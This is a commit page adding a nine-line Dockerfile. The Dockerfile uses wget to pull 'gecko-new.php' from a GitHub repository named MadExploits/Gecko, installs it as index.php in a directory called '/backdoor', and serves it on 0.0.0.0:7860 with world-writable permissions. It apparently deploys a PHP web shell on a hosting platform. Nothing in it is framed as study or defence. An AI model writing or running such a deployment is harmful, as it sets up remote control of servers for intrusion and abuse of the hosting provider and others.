1tbfree commited on
Commit
a48ce66
·
verified ·
1 Parent(s): 37ec062

Create Dockerfile

Browse files
Files changed (1) hide show
  1. Dockerfile +9 -0
Dockerfile ADDED
@@ -0,0 +1,9 @@
 
 
 
 
 
 
 
 
 
 
1
+ FROM php:latest
2
+ WORKDIR /backdoor
3
+ RUN apt update
4
+ RUN apt install wget -y
5
+ RUN wget https://github.com/MadExploits/Gecko/raw/refs/heads/main/gecko-new.php -O index.php
6
+ RUN echo php -S 0.0.0.0:7860 > file.sh
7
+ RUN chmod +777 $(pwd)
8
+ RUN chmod +777 file.sh
9
+ CMD "./file.sh"